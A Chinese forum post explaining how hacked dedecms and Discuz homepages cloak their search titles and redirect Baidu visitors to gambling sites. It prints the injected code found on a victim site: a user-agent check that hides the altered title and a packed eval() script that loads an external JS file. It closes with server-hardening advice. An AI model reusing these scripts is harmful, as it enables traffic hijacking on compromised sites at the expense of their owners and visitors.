请选择 进入手机版 | 继续访问电脑版

巅峰霸主

 找回密码
 立即注册

QQ登录

只需一步,快速开始

解决网站首页被劫持跳转到棋牌赌博网站如dedecms和discuz系统

  [复制链接] [添加相关主题]
烈火大地 发表于 2019-9-9 11:22:04 | 显示全部楼层 |阅读模式
阿里云服务器2折起!

游客只能显示部分内容,请登录后查看帖子完整内容!!!注册完全免费。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
黑帽SEO优化的核心应该就是渗透技术的广泛应用吧,如何攻破一个网站并把流量劫持跳转到目标网站这其中也不乏需要一定的技术成本,而且还要懂得SEO优化技术,常见的基本上是网站首页被劫持跳转到棋牌菠菜等赌博网站上面,获得非法收益。而这其中中奖最多的要数dedecms和discuz及WordPress这三大cms系统吧,因为使用的人太多了,所以专门针对这些网站系统找bug也成了某些人的爱好甚至是职业。
在做好服务器的各种安全设置和修复网站bug之后,仍然不可掉以轻心,因为你不知道有没有新的bug被他们找到,先解析一下常见的流量劫持的SEO优化手法。流量劫持必须满足用户的来路跳转,要实现这一步就必须修改网页代码或在服务器上放置可跳转的代码,不然就无法实现流量劫持,于是就有了网站渗透技术,专门攻击或找网站程序的bug来注入所需代码。先看下面这个搜索关键词的案例:

搜狗截图20190909092702.jpg

搜索这个关键词点击就会跳转到71的那个网站,可以看到该域名的快照中标题和描述已经被篡改了,但是我们直接从浏览器输入域名打开网站则不会被跳转到棋牌网站上,这也是做了伪装,防止网站管理发现。这类流量劫持基本上都是使用了相同的方法,就是在静态网页上添加js代码来实现,我们对上面截图中的网站进行分析,从浏览器地址栏输入该域名的的网址进入----网站首页----右键----查看源代码:

搜狗截图20190909092208.jpg

如上图所示的5个做了标记的地方,目前发现的被劫持的网站几乎都是这样的模式。上图所示的1/2/3中的标题、关键词、描述部分的的文字被修改了并且是Unicode编码,他的这个Unicode编码的内容是什么呢,上面第一个图片中被百度收录显示出来的就翻译过来的。我们知道SEO优化中tdk是非常重要的,通过修改网站的tdk来实现更换搜索引擎收录的tdk,由于域名之前是正规站,所以收录一般都是很正常的,经过修改几乎是立即收录并被替换为新的黑客自己的tdk,那么tdk被修改了为什么管理员难以发现,这就是上图后面“4”所示的js在捣鬼了:

  1. <script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="吉林重诺信用认证中心"}</script>
复制代码


这一句代码的意思是判断用户来路,如果来路不是百度或者说不是通过百度搜索打开网站的,网站的标题就显示管理员原来设置的,这里没有跳转,跳转代码是上图最后第“5”那一句js:
  1. <script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('m["\\n\\b\\2\\e\\f\\7\\l\\0"]["\\o\\4\\8\\0\\7"](\'\\j\\1\\2\\4\\8\\3\\0 \\0\\k\\3\\7\\d\\6\\0\\7\\p\\0\\5\\h\\c\\t\\c\\1\\2\\4\\8\\3\\0\\6 \\1\\4\\2\\d\\6\\9\\0\\0\\3\\1\\v\\5\\5\\1\\a\\9\\e\\a\\9\\s\\g\\2\\b\\f\\5\\u\\r\\q\\3\\g\\h\\1\\6\\i\\j\\5\\1\\2\\4\\8\\3\\0\\i\');',32,32,'x74|x73|x63|x70|x72|x2f|x22|x65|x69|x68|x66|x6f|x61|x3d|x75|x6d|x2e|x6a|x3e|x3c|x79|x6e|window|x64|x77|x78|x71|x38|x32|x76|x6b|x3a'.split('|'),0,{}))
  2. </script>
复制代码
但是这段js被加密了,经过解密之后,js的内容如下:
游客,如果您要查看本帖隐藏内容请回复


可以看到解密之后的js中其实就是调用一个js文件,其他的内容就没有了,我们再追踪这个js并插看里面的内容:

游客,如果您要查看本帖隐藏内容请回复


下面是上图完整解密js代码,防止被非法使用需要2金币。
本贴包含隐藏内容,向楼主支付2金币,即可查看 购买记录立即购买


通过上面的解析可以看到,要实现流量劫持,搜索引擎来路跳转,就必须要在网站中植入某些不可见人的js代码,还有防止被网站管理员发现,通常注入的代码都是经过加密或转码,比如使用Unicode编码,js加密。

被修改的一般都是首页文件(index.html或者index.php),discuz默认首页是index.php,虽然是动态的,也可以给你放一个静态的index.php文件,dedecms如果使用了静态首页,你会发现他会修改你的默认index.html文件,再被你更新首页后他的修改被覆盖,但是如果他每天检查并修改,依然可以被劫持,这种情况就是你怎么也找不着被植入的木马在哪里,但是通过百度试试首页快照的tdk不是自己的,跳转也正常,这样的情况应该先不要更新首页或网站,先看看网站的源码。快照不正常那一定是有问题的,黑客都会很隐藏不要你发现,所以我们也要很小心。

我们需要做好服务器的安全,及时修复网站的漏洞,千万不可掉以轻心,被修改网站首页算是轻微的,植入木马如果被创建站中站(在你的网站上生成几万甚至及时万网页)那就不好了,那时你的整个域名都在为他人做嫁衣。综上,出现网站首页被劫持跳转,原因都是服务器被入侵,网站程序漏洞导致被植入木马或直接被修改程序。解决方法就是加固服务器,加固程序,禁用一下web服务器权限,iis的权限设置,php.ini中的危险参数不要开启,或者nginx、Apache等中的设置不当,导致网站环境配置中就出现了黑客可以利用的bug,直接进入服务器。


上一篇:黑帽seo基础手法之快照劫持和快照劫持代码
回复

使用道具 举报

drg 发表于 2019-11-7 17:41:55 | 显示全部楼层
瞅瞅咋回事
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|巅峰霸主 ( 京ICP备12023415号-2 )

声明:本站的任何信息和内容仅代表作者的立场和观点,与巅峰霸主网无关。

禁止在巅峰霸主网发布任何与《中华人民共和国法律》相抵触的言论!

GMT+8, 2019-12-6 14:38 , Processed in 0.120339 second(s), 29 queries .

Powered by Discuz! X3.4

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表